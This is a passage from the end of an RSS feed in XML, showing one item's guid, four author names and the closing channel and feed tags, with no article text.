            <guid isPermaLink="false">2UUR6KEw3qV6N5GMCAV7eS</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Mru Kodali</dc:creator>
            <dc:creator>Syeef Karim</dc:creator>
            <dc:creator>Daniele Molteni</dc:creator>
        </item>
    </channel>
</rss>